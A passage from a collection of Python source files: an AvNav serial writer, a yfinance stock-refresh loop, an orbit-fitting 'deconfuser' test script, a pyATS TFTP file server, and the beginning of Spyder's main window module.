    entry = WorkerStatus(key, status, txt)
    self.combinedStatus[key] = entry
    self._updateStatus()
def deleteInfoWithKey(self, key):
    """Drop the status entry for *key* (ignoring a missing key) and
    refresh the aggregated 'main' status."""
    self.combinedStatus.pop(key, None)
    self._updateStatus()
# a Worker to directly write to a serial line using pyserial
# on windows use an int for the port - e.g. use 4 for COM5
# on linux use the device name for the port
# if no data is received within timeout *10 the port is closed and reopened
# this gives the chance to handle dynamically assigned ports with no issues
class AVNSerialWriter(AVNWorker):
    """Worker that owns a SerialWriter and keeps it running (restarting
    it after errors)."""

    @classmethod
    def getConfigName(cls):
        # tag name of this handler in the XML configuration
        return "AVNSerialWriter"

    @classmethod
    def getConfigParam(cls, child=None):
        # no child config elements; the parameter set comes from SerialWriter
        if not child is None:
            return None
        cfg = SerialWriter.getConfigParam()
        rt = cfg.copy()
        return rt

    @classmethod
    def createInstance(cls, cfgparam):
        # factory used by the handler framework; refuses to create an
        # instance when the pyserial module could not be imported
        if not hasSerial:
            AVNLog.warn("serial writers configured but serial module not available, ignore them")
            return None
        rt = AVNSerialWriter(cfgparam)
        return rt

    @classmethod
    def canEdit(cls):
        # parameters of this handler may be edited from the UI
        return True

    @classmethod
    def canDeleteHandler(cls):
        # the handler may be removed from the configuration via the UI
        return True

    @classmethod
    def getEditableParameters(cls, makeCopy=True, id=None):
        # NOTE(review): makeCopy is ignored - the super call always passes
        # True; confirm whether that is intended
        rt = super().getEditableParameters(True, id=id)
        # offer only serial ports not already claimed by other workers
        slist = SerialReader.listSerialPorts()
        slist = UsedResource.filterListByUsed(UsedResource.T_SERIAL, slist,
                                              cls.findUsersOf(UsedResource.T_SERIAL, ownId=id))
        WorkerParameter.updateParamFor(rt, 'port', {'rangeOrList': slist})
        return rt

    def __init__(self, param):
        # port and timeout are mandatory for a serial writer
        for p in ('port', 'timeout'):
            if param.get(p) is None:
                raise Exception("missing " + p + " parameter for serial writer")
        AVNWorker.__init__(self, param)
        # the SerialWriter instance; created lazily in run()
        self.writer = None

    def checkConfig(self, param):
        # reject a configuration claiming a serial port used elsewhere
        if 'port' in param:
            self.checkUsedResource(UsedResource.T_SERIAL, param.get('port'))

    def stop(self):
        # best effort: stop the underlying writer before stopping the worker
        try:
            self.writer.stopHandler()
        except:
            pass
        super().stop()

    # thread run method - just try forever
    def run(self):
        while not self.shouldStop():
            self.setNameIfEmpty("%s-%s" % (self.getName(), str(self.getParamValue('port'))))
            # (re)claim the configured serial port on every restart
            self.freeAllUsedResources()
            self.claimUsedResource(UsedResource.T_SERIAL, self.getParamValue('port'))
            try:
                # SerialWriter.run blocks until it is stopped or fails
                self.writer = SerialWriter(self.param, self.writeData, self, self.getSourceName(self.getParamValue('port')))
                self.writer.run()
            except Exception as e:
                AVNLog.error("exception in serial writer: %s", traceback.format_exc())
            # back off a little before restarting the writer
            self.wait(2000)
            AVNLog.info("restarting serial writer")

    def updateConfig(self, param, child=None):
        # validate the new port before applying, then stop the writer so
        # the run loop restarts it with the new configuration
        if 'port' in param:
            self.checkUsedResource(UsedResource.T_SERIAL, param['port'])
        super().updateConfig(param, child)
        if self.writer is not None:
            self.writer.stopHandler()
avnav_handlerList.registerHandler(AVNSerialWriter)
|
stockRefreshModule.py | import time
import yfinance as yf
import threading
from dotenv import load_dotenv
import src.app.domain.collections.stocks.stocksQueries as stockQueries
from random import randrange
from src.app.domain.collections.stocks.stocksDatabaseAccess import refreshRegularPriceForStock
from src.app.domain.collections.stocks.stocksDatabaseUtility import *
from src.app.database.utility import SqlUtility
from src.app.database.utility.StockUtility import *
def refreshAllStockAnalytics():
    """Kick off the background thread that periodically refreshes all
    stock data from the YF API."""
    worker = threading.Thread(target=startRefreshLoop)
    worker.start()
def startRefreshLoop():
    """Endless refresh loop (meant to run on a background thread).

    Each cycle: load all known ticker/suffix pairs from the DB, request
    them from yfinance in one batch, refresh the stored analytics per
    ticker, refresh the regular prices, then sleep 180s and repeat.
    """
    while True:
        print('Refreshing stock data from YF API')
        load_dotenv()
        selectAllTickersQueryString = stockQueries.getAllStockTickersAndSuffixes()
        queryResponseTuples = SqlUtility.executeSelectRequest(selectAllTickersQueryString)
        # build both the space-separated string for yf.Tickers and the
        # plain list used for the price refresh below
        stockTickersString = ''
        stockTickersList = []
        for stockTuple in queryResponseTuples:
            stockTicker, stockSuffix = stockTuple
            stockTickerAggregate = concatenateTickerAndSuffix(stockTicker, stockSuffix)
            stockTickersString += ' ' + stockTickerAggregate
            stockTickersList += [stockTickerAggregate]
        try:
            yfStockResponse = yf.Tickers(stockTickersString)
        except Exception:
            # NOTE(review): this return ends the refresh loop permanently -
            # confirm whether a retry/continue was intended instead
            print('YFinance API rejected Tickers request')
            return
        # NOTE(review): assumes Tickers.tickers yields Ticker objects when
        # iterated; newer yfinance versions expose a dict here - verify
        # against the pinned yfinance version
        for tickerObject in yfStockResponse.tickers:
            refreshStockByTickerAndSuffix(tickerObject)
        for tickerObject in stockTickersList:
            refreshPriceForStock(tickerObject)
        print('Refresh successful')
        time.sleep(180)
def refreshStockByTickerAndSuffix(yfStockObject):
    """Refresh one stock's stored fields from a yfinance Ticker object.

    Sleeps briefly first to throttle requests against the YF API, then
    pulls ``.info``, sanitizes it and issues an UPDATE for the ticker.
    API failures are logged and swallowed so one bad ticker does not
    stop the refresh loop.
    """
    try:
        # randrange's upper bound is exclusive: the original
        # randrange(1, 2) always returned 1, so the intended 1-2s
        # jitter never happened; (1, 3) yields 1 or 2
        time.sleep(randrange(1, 3))
        print('Updating for ' + str(yfStockObject))
        stock = correctStockMissingOrInvalidFields(yfStockObject.info)
    except Exception:
        print('YFinance API rejected .info request')
        return
    stockTicker, stockSuffix = splitTickerAggregate(stock['symbol'])
    updateQuery = stockQueries.getRefreshStockQueryForTickerAndSuffix(stockTicker, stockSuffix, stock)
    SqlUtility.executeUpdateRequest(updateQuery)
def refreshPriceForStock(stockTicker):
    """Refresh the stored regular price for one ticker aggregate.

    Sleeps briefly first to throttle requests against the YF API;
    failures are logged and swallowed so one bad ticker does not stop
    the refresh loop.
    """
    try:
        # randrange's upper bound is exclusive: the original
        # randrange(1, 2) always returned 1; (1, 3) yields 1 or 2
        time.sleep(randrange(1, 3))
        print('Adjusting price for ' + stockTicker)
        refreshRegularPriceForStock(stockTicker)
    except Exception:
        print('YFinance API rejected download request')
|
test_deconfuser.py | import numpy as np
import multiprocessing
import itertools
import argparse
import os
import deconfuser.sample_planets as sample_planets
import deconfuser.orbit_fitting as orbit_fitting
import deconfuser.orbit_grouping as orbit_grouping
import deconfuser.partition_ranking as partition_ranking
mu_sun = 4*np.pi**2  # Sun's gravitational parameter in AU^3/year^2

# command-line interface.  Note: the positional argument was originally
# misspelled "toleranes"; fixed here - invocation is unchanged because the
# argument is positional.
parser = argparse.ArgumentParser(description="Monte-Carlo testing of the deconfuser")
parser.add_argument("--n_planets", type=int, default=3, help="number of planets per system (default: 3)")
parser.add_argument("--n_epochs", type=int, default=4, help="number of observation epochs (default: 4)")
parser.add_argument("--cadence", type=float, default=0.5, help="observation cadence in years (default: 0.5)")
parser.add_argument("--mu", type=float, default=mu_sun, help="gravitational parameter in AU^3/year^2 (default: 4pi^2)")
parser.add_argument("--min_a", type=float, default=0.25, help="minimum semi-major axis in AU (default: 0.25)")
parser.add_argument("--max_a", type=float, default=2.0, help="maximum semi-major axis in AU (default: 2.0)")
parser.add_argument("--sep_a", type=float, default=0.3, help="minimum semi-major difference in AU (default: 0.3)")
parser.add_argument("--min_i", type=float, default=0, help="minimum inclination in radians (default: 0)")
parser.add_argument("--max_i", type=float, default=np.pi/2, help="maximum inclination in radians (default: pi/2)")
parser.add_argument("--max_e", type=float, default=0.3, help="maximum eccentricity (default: 0.3)")
parser.add_argument("--spread_i_O", type=float, default=0.0, help="spread of inclination and LAN in radians (default: 0.0 - coplanar)")
parser.add_argument("--n_processes", type=int, default=4, help="number of concurrent processes (default: 4)")
parser.add_argument("--n_systems", type=int, default=10, help="number of systems per process (default: 10)")
parser.add_argument("-v", "--verbose", action="store_true", help="print planet data")
parser.add_argument("tolerances", type=float, nargs="+", help="orbit fit tolerances")
args = parser.parse_args()

# observation epochs (years)
ts = args.cadence*np.arange(args.n_epochs)
# the correct partition of detections by planets
correct_partition = [tuple(range(i*len(ts), (i+1)*len(ts))) for i in range(args.n_planets)]

# to speed up computation, begin with coarsest tolerance and progress to finest:
# 1. full orbit grouping will be performed with the coarsest tolerance (i.e., recursively consider all groupings of observations)
# 2. only "full" groups that fit observations within a coarser tolerance will be fitted with a finer tolerance
# Note: "missed" detections are not simulated here so confusion will only "arise" with full groups (n_epochs observations per planet)
tolerances = sorted(args.tolerances, reverse=True)
orbit_grouper = orbit_grouping.OrbitGrouper(args.mu, ts, args.min_a-tolerances[0], args.max_a+tolerances[0], args.max_e, tolerances[0], lazy_init=False)
orbit_fitters = [orbit_fitting.OrbitFitter(args.mu, ts, args.min_a-tol, args.max_a+tol, args.max_e, tol) for tol in tolerances[1:]]

# multi-process printing
printing_lock = multiprocessing.Lock()
def _print(*v):
    """Print *v* prefixed with the pid, serialized across processes.

    Uses the lock as a context manager so it is released even when
    print raises (the original acquire/release pair could leak the
    lock); flush=True replaces the odd os.sys.stdout.flush() call.
    """
    with printing_lock:
        print(os.getpid(), *v, flush=True)
# main function to be run from multiple processes (the large lookup tables are read-only and shared between processes)
def generate_and_test_systems():
    """Generate random planetary systems and test the deconfuser on them.

    For each of args.n_systems systems: sample orbital elements,
    synthesize noisy observations, group them into candidate orbits at
    the coarsest tolerance, then progressively re-fit with finer
    tolerances and report correct/spurious orbits and partition
    confusion.
    """
    # seed per process so each worker generates different systems
    np.random.seed(os.getpid())
    for _ in range(args.n_systems):
        # choose random orbit parameters for each planet
        a,e,i,o,O,M0 = sample_planets.random_planet_elements(args.n_planets, args.min_a, args.max_a, args.max_e, args.sep_a, args.min_i, args.max_i, args.spread_i_O)
        # get coordinates of planets when observed
        xs,ys = sample_planets.get_observations(a, e, i, o, O, M0, ts, args.mu)
        observations = np.stack([xs,ys], axis=2).reshape((-1,2))
        # add radially bounded astrometry error (radius bounded by the finest tolerance)
        noise_r = tolerances[-1]*np.random.random(len(observations))
        noise_a = 2*np.pi*np.random.random(len(observations))
        observations[:,0] += noise_r*np.cos(noise_a)
        observations[:,1] += noise_r*np.sin(noise_a)
        if args.verbose:
            _print("ts =", list(ts))
            for ip in range(args.n_planets):
                _print("a,e,i,o,O,M0 = ", (a[ip],e[ip],i[ip],o[ip],O[ip],M0[ip]))
                _print("xys =", list(map(list, observations[ip*len(ts):(ip+1)*len(ts)])))
        # all detection times for all observations
        all_ts = np.tile(ts, args.n_planets)
        # get all possible (full or partial) groupings of detections by orbits that fit them with the coarsest tolerance
        groupings = orbit_grouper.group_orbits(observations, all_ts)
        # select only groupings that include all epochs (these will be most highly ranked, so no need to check the rest)
        groupings = [g for g in groupings if len(g) == args.n_epochs]
        # check for spurious orbits and repeat for finer tolerances
        for j in range(len(tolerances)):
            found_correct = sum(cg in groupings for cg in correct_partition)
            _print("Tolerance %f: found %d correct and %d spurious orbits out of %d"%(tolerances[j], found_correct, len(groupings) - found_correct, args.n_planets))
            if args.verbose:
                _print("Tolerance %f:"%(tolerances[j]), groupings)
            # find all partitions of observations to exactly n_planets groups
            # note that since all partial groupings were filtered out, all partitions will have exactly n_planets groups
            top_partitions = list(partition_ranking.get_ranked_partitions(groupings))
            if found_correct < args.n_planets:
                for ip in range(args.n_planets):
                    if not correct_partition[ip] in groupings:
                        _print("Failed to fit a correct orbit for planet %d!"%(ip))
            elif len(top_partitions) == 1:
                _print("Tolerance %f: no confusion"%(tolerances[j]))
            else:
                assert(len(top_partitions) > 1)
                _print("Tolerance %f: found %d spurious \"good\" paritions of detections by planets (confusion)"%(tolerances[j], len(top_partitions) - 1))
            if args.verbose:
                _print("Tolerance %f:"%(tolerances[j]), top_partitions)
            # move to a finer tolerance
            if j < len(tolerances) - 1:
                # only keep groupings that can be fitted with an orbit within the finer tolerance
                groupings = [g for g in groupings if any(err < tolerances[j+1] for err in orbit_fitters[j].fit(observations[list(g)], only_error=True))]
# run testing from multiple processes
workers = []
for _ in range(args.n_processes):
    proc = multiprocessing.Process(target=generate_and_test_systems)
    proc.start()
    workers.append(proc)
# wait for all processes to finish
for proc in workers:
    proc.join()
|
tftp.py | import logging
import os
import random
import signal
import tempfile
import threading
from pyats.utils.sig_handlers import enable_double_ctrl_c
from tftpy import TftpClient, TftpServer
from ..server import FileServer as BaseFileServer
from ..server import ALPHA
DEFAULT_PORT = 0
class FileServer(BaseFileServer):
    '''FileServer for tftp protocol
    Starts a TFTP server in another process and returns address information
    '''
    protocol = 'tftp'

    def run_server(self):
        """Run a tftpy server in this process until terminated."""
        # Run server in separate process
        # ignore Ctrl+C here; shutdown is driven by the parent process
        signal.signal(signal.SIGINT, lambda x, y: None)
        address = self.server_info['address']
        port = self.server_info.get('port', DEFAULT_PORT)
        self.path = self.server_info.setdefault('path', '/')
        server = TftpServer(self.path)
        # optional dedicated logfile for the tftpy server side
        logfile = self.server_info.get('logfile', None)
        if logfile:
            ftp_logger = logging.getLogger('tftpy')
            ftp_logger.setLevel(logging.DEBUG)
            ftp_logger.propagate = False
            ftp_handler = logging.FileHandler(logfile)
            ftp_logger.addHandler(ftp_handler)
        # Port is only allocated after server is running, so start a thread
        # to retrieve
        threading.Thread(target=self.get_port, args=(server,)).start()
        # blocks until the server is stopped
        server.listen(address, port)

    def verify_server(self):
        """Upload a small generated file through a TftpClient and check
        that it arrived; raises OSError when the upload did not land."""
        ip = self.server_info['address']
        port = self.server_info['port']
        path = self.server_info['path']
        # Set up client logging
        logfile = self.server_info.get('logfile', None)
        if logfile:
            # derive a separate client logfile next to the server one
            logfile = '%s.client%s' % os.path.splitext(logfile)
            ftp_logger = logging.getLogger('tftpy')
            ftp_logger.setLevel(logging.DEBUG)
            ftp_logger.propagate = False
            ftp_handler = logging.FileHandler(logfile)
            ftp_logger.addHandler(ftp_handler)
        # Create a temporary file to copy to the TFTP server
        with tempfile.TemporaryDirectory() as tmpdir:
            # Create a file that will not conflict with any existing files
            filename = self._generate_filename()
            filepath = os.path.join(tmpdir, filename)
            with open(filepath, 'w') as f:
                f.write('ab'*100)
            # can't write to root. Use tmpdir instead
            if path == '/':
                filename = os.path.join(tmpdir, '%s2' % filename)
            client = TftpClient(ip, port)
            client.upload(filename, filepath)
            # Confirm file was copied
            upfilepath = os.path.join(path, filename)
            if not os.path.isfile(upfilepath):
                raise OSError('TFTP Upload unsuccessful')
            os.remove(upfilepath)

    def get_port(self, server):
        # Threaded function to get the allocated port for the TFTP server
        # waits (up to 5s) for the server to come up, then reports the
        # OS-assigned port back to the parent via the queue
        server.is_running.wait(5)
        self.queue.put({'port': server.listenport, 'path': self.path})

    def _generate_filename(self):
        """Return a random filename not yet present under the served path;
        raises OSError when five attempts all collide."""
        path = self.server_info['path']
        for i in range(5):
            filename = ''.join([random.choice(ALPHA) for x in range(10)])
            filepath = '%s/%s' % (path, filename)
            if not os.path.exists(filepath):
                return filename
        raise OSError('Could not find filename not already in %s' % path)
|
mainwindow.py | # -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific PYthon Development EnviRonment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
import atexit
import errno
import gc
import os
import os.path as osp
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import traceback
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit

#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()

#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
# these placeholders stay None on non-Windows platforms
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
    from spyder.utils.windows import (set_attached_console_visible,
                                      is_attached_console_visible,
                                      set_windows_appusermodelid)

#==============================================================================
# Workaround: importing rope.base.project here, otherwise this module can't
# be imported if Spyder was executed from another folder than spyder
#==============================================================================
try:
    import rope.base.project  # analysis:ignore
except ImportError:
    # rope is optional
    pass
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QSplashScreen,
QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
# To catch font errors in QtAwesome
from qtawesome.iconic_font import FontError
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attribute must
# be set before creating the application.
#==============================================================================
from spyder.config.main import CONF
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
    QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling, CONF.get('main', 'high_dpi_scaling'))

#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication, MENU_SEPARATOR
from spyder.config.base import get_image_path
MAIN_APP = qapplication()

# the svg icon needs PyQt5; fall back to the png otherwise
if PYQT5:
    APP_ICON = QIcon(get_image_path("spyder.svg"))
else:
    APP_ICON = QIcon(get_image_path("spyder.png"))
MAIN_APP.setWindowIcon(APP_ICON)

#==============================================================================
# Create splash screen out of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV, running_under_pytest
if not running_under_pytest():
    SPLASH = QSplashScreen(QPixmap(get_image_path('splash.svg')))
    SPLASH_FONT = SPLASH.font()
    SPLASH_FONT.setPixelSize(10)
    SPLASH.setFont(SPLASH_FONT)
    SPLASH.show()
    SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter |
                       Qt.AlignAbsolute, QColor(Qt.white))
    QApplication.processEvents()
else:
    # no splash screen while running the test suite
    SPLASH = None
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, __trouble_url_short__, get_versions)
from spyder.config.base import (get_conf_path, get_module_source_path, STDERR,
DEBUG, debug_print, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.app.cli_options import get_options
from spyder import dependencies
from spyder.py3compat import (is_text_string, to_text_string,
PY3, qbytearray_to_str, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.introspection import module_completion
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port, getcwd_or_home, get_python_executable
from spyder.widgets.fileswitcher import FileSwitcher
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri)
from spyder.config.gui import get_shortcut
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
# captured once at import time, before any plugin changes the cwd
CWD = getcwd_or_home()
#==============================================================================
# Spyder's main window widgets utilities
#==============================================================================
def get_python_doc_path():
    """
    Return Python documentation path
    (Windows: return the PythonXX.chm path if available)
    """
    if os.name == 'nt':
        doc_dir = osp.join(sys.prefix, "Doc")
        if not osp.isdir(doc_dir):
            return
        chm_files = [name for name in os.listdir(doc_dir)
                     if re.match(r"(?i)Python[0-9]{3,6}.chm", name)]
        if chm_files:
            return file_uri(osp.join(doc_dir, chm_files[0]))
    else:
        major, minor = sys.version_info[0], sys.version_info[1]
        html_dir = '/usr/share/doc/python%d.%d/html' % (major, minor)
        index_page = osp.join(html_dir, "index.html")
        if osp.isfile(index_page):
            return file_uri(index_page)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
BOOKMARKS = (
('Python2', "https://docs.python.org/2/index.html",
_("Python2 documentation")),
('Python3', "https://docs.python.org/3/index.html",
_("Python3 documentation")),
('numpy', "http://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "http://matplotlib.sourceforge.net/contents.html",
_("Matplotlib documentation")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/",
_("PyQt5 Reference Guide")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/class_reference.html",
_("PyQt5 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
all_actions_defined = Signal()
sig_pythonpath_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # related to interactive tour
sig_moved = Signal("QMoveEvent") # related to interactive tour
def __init__(self, options=None):
    """Build the main window: install signal handlers, load saved
    path/config state, and initialize all plugin/action/menu/toolbar
    placeholders.

    The heavy UI construction happens later in setup(); this constructor
    only prepares state and creates the single-instance file socket.
    """
    QMainWindow.__init__(self)
    qapp = QApplication.instance()
    if PYQT5:
        # Enabling scaling for high dpi
        qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
    self.default_style = str(qapp.style().objectName())
    self.dialog_manager = DialogManager()
    # command line options (see spyder.app.cli_options)
    self.init_workdir = options.working_directory
    self.profile = options.profile
    self.multithreaded = options.multithreaded
    self.new_instance = options.new_instance
    self.open_project = options.open_project
    self.window_title = options.window_title
    self.debug_print("Start of MainWindow constructor")

    def signal_handler(signum, frame=None):
        """Handler for signals."""
        sys.stdout.write('Handling signal: %s\n' % signum)
        sys.stdout.flush()
        QApplication.quit()

    if os.name == "nt":
        try:
            import win32api
            win32api.SetConsoleCtrlHandler(signal_handler, True)
        except ImportError:
            pass
    else:
        signal.signal(signal.SIGTERM, signal_handler)
        if not DEV:
            # Make spyder quit when pressing ctrl+C in the console
            # In DEV Ctrl+C doesn't quit, because it helps to
            # capture the traceback when spyder freezes
            signal.signal(signal.SIGINT, signal_handler)

    # Use a custom Qt stylesheet
    if sys.platform == 'darwin':
        spy_path = get_module_source_path('spyder')
        img_path = osp.join(spy_path, 'images')
        mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
        mac_style = mac_style.replace('$IMAGE_PATH', img_path)
        self.setStyleSheet(mac_style)

    # Create our TEMPDIR
    if not osp.isdir(programs.TEMPDIR):
        os.mkdir(programs.TEMPDIR)

    # Shortcut management data
    self.shortcut_data = []

    # Loading Spyder path
    self.path = []
    self.not_active_path = []
    self.project_path = []
    if osp.isfile(self.SPYDER_PATH):
        self.path, _x = encoding.readlines(self.SPYDER_PATH)
        # drop entries that no longer exist on disk
        self.path = [name for name in self.path if osp.isdir(name)]
    if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
        self.not_active_path, _x = \
            encoding.readlines(self.SPYDER_NOT_ACTIVE_PATH)
        self.not_active_path = \
            [name for name in self.not_active_path if osp.isdir(name)]
    self.remove_path_from_sys_path()
    self.add_path_to_sys_path()

    # Plugins (all populated later in setup())
    self.console = None
    self.workingdirectory = None
    self.editor = None
    self.explorer = None
    self.help = None
    self.onlinehelp = None
    self.projects = None
    self.outlineexplorer = None
    self.historylog = None
    self.ipyconsole = None
    self.variableexplorer = None
    self.findinfiles = None
    self.thirdparty_plugins = []

    # Tour  # TODO: Should I consider it a plugin?? or?
    self.tour = None
    self.tours_available = None

    # File switcher
    self.fileswitcher = None

    # Check for updates Thread and Worker, references needed to prevent
    # segfaulting
    self.check_updates_action = None
    self.thread_updates = None
    self.worker_updates = None
    self.give_updates_feedback = True

    # Preferences
    from spyder.plugins.configdialog import (MainConfigPage,
                                             ColorSchemeConfigPage)
    from spyder.plugins.shortcuts import ShortcutsConfigPage
    from spyder.plugins.runconfig import RunConfigPage
    from spyder.plugins.maininterpreter import MainInterpreterConfigPage
    self.general_prefs = [MainConfigPage, ShortcutsConfigPage,
                          ColorSchemeConfigPage, MainInterpreterConfigPage,
                          RunConfigPage]
    self.prefs_index = None
    self.prefs_dialog_size = None

    # Quick Layouts and Dialogs
    from spyder.plugins.layoutdialog import (LayoutSaveDialog,
                                             LayoutSettingsDialog)
    self.dialog_layout_save = LayoutSaveDialog
    self.dialog_layout_settings = LayoutSettingsDialog

    # Actions (created in setup())
    self.lock_dockwidgets_action = None
    self.show_toolbars_action = None
    self.close_dockwidget_action = None
    self.undo_action = None
    self.redo_action = None
    self.copy_action = None
    self.cut_action = None
    self.paste_action = None
    self.selectall_action = None
    self.maximize_action = None
    self.fullscreen_action = None

    # Menu bars
    self.file_menu = None
    self.file_menu_actions = []
    self.edit_menu = None
    self.edit_menu_actions = []
    self.search_menu = None
    self.search_menu_actions = []
    self.source_menu = None
    self.source_menu_actions = []
    self.run_menu = None
    self.run_menu_actions = []
    self.debug_menu = None
    self.debug_menu_actions = []
    self.consoles_menu = None
    self.consoles_menu_actions = []
    self.projects_menu = None
    self.projects_menu_actions = []
    self.tools_menu = None
    self.tools_menu_actions = []
    self.external_tools_menu = None  # We must keep a reference to this,
    # otherwise the external tools menu is lost after leaving setup method
    self.external_tools_menu_actions = []
    self.view_menu = None
    self.plugins_menu = None
    self.plugins_menu_actions = []
    self.toolbars_menu = None
    self.help_menu = None
    self.help_menu_actions = []

    # Status bar widgets
    self.mem_status = None
    self.cpu_status = None

    # Toolbars
    self.visible_toolbars = []
    self.toolbarslist = []
    self.main_toolbar = None
    self.main_toolbar_actions = []
    self.file_toolbar = None
    self.file_toolbar_actions = []
    self.edit_toolbar = None
    self.edit_toolbar_actions = []
    self.search_toolbar = None
    self.search_toolbar_actions = []
    self.source_toolbar = None
    self.source_toolbar_actions = []
    self.run_toolbar = None
    self.run_toolbar_actions = []
    self.debug_toolbar = None
    self.debug_toolbar_actions = []
    self.layout_toolbar = None
    self.layout_toolbar_actions = []

    if running_under_pytest():
        # Show errors in internal console when testing.
        CONF.set('main', 'show_internal_errors', False)

    # Set window title
    self.set_window_title()

    if set_windows_appusermodelid != None:
        res = set_windows_appusermodelid()
        debug_print("appusermodelid: " + str(res))

    # Setting QTimer if running in travis
    test_travis = os.environ.get('TEST_CI_APP', None)
    if test_travis is not None:
        global MAIN_APP
        timer_shutdown_time = 30000
        self.timer_shutdown = QTimer(self)
        self.timer_shutdown.timeout.connect(MAIN_APP.quit)
        self.timer_shutdown.start(timer_shutdown_time)

    # Showing splash screen
    self.splash = SPLASH
    if CONF.get('main', 'current_version', '') != __version__:
        CONF.set('main', 'current_version', __version__)
        # Execute here the actions to be performed only once after
        # each update (there is nothing there for now, but it could
        # be useful some day...)

    # List of satellite widgets (registered in add_dockwidget):
    self.widgetlist = []

    # Flags used if closing() is called by the exit() shell command
    self.already_closed = False
    self.is_starting_up = True
    self.is_setting_up = True

    self.dockwidgets_locked = CONF.get('main', 'panes_locked')
    self.floating_dockwidgets = []
    self.window_size = None
    self.window_position = None
    self.state_before_maximizing = None
    self.current_quick_layout = None
    self.previous_layout_settings = None  # TODO: related to quick layouts
    self.last_plugin = None
    self.fullscreen_flag = None  # isFullscreen does not work as expected
    # The following flag remember the maximized state even when
    # the window is in fullscreen mode:
    self.maximized_flag = None

    # To keep track of the last focused widget
    self.last_focused_widget = None
    self.previous_focused_widget = None

    # Server to open external files on a single instance
    # This is needed in order to handle socket creation problems.
    # See issue 4132
    if os.name == 'nt':
        try:
            self.open_files_server = socket.socket(socket.AF_INET,
                                                   socket.SOCK_STREAM,
                                                   socket.IPPROTO_TCP)
        except OSError as e:
            self.open_files_server = None
            QMessageBox.warning(None, "Spyder",
                                _("An error occurred while creating a socket needed "
                                  "by Spyder. Please, try to run as an Administrator "
                                  "from cmd.exe the following command and then "
                                  "restart your computer: <br><br><span "
                                  "style=\'color: #555555\'><b>netsh winsock reset"
                                  "</b></span><br>"))
    else:
        self.open_files_server = socket.socket(socket.AF_INET,
                                               socket.SOCK_STREAM,
                                               socket.IPPROTO_TCP)

    self.apply_settings()
    self.debug_print("End of MainWindow constructor")
def debug_print(self, message):
    """Forward *message* to the module-level debug printer."""
    debug_print(message)
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
    """Add a toolbar with *title* and *object_name* to the window.

    The new toolbar is recorded in ``self.toolbarslist`` so it can be
    shown/hidden together with the other toolbars, and is returned to
    the caller.
    """
    new_toolbar = self.addToolBar(title)
    new_toolbar.setObjectName(object_name)
    new_toolbar.setIconSize(QSize(iconsize, iconsize))
    self.toolbarslist.append(new_toolbar)
    return new_toolbar
def setup(self):
    """Setup main window.

    Creates the core actions, the menu bar menus and their toolbars,
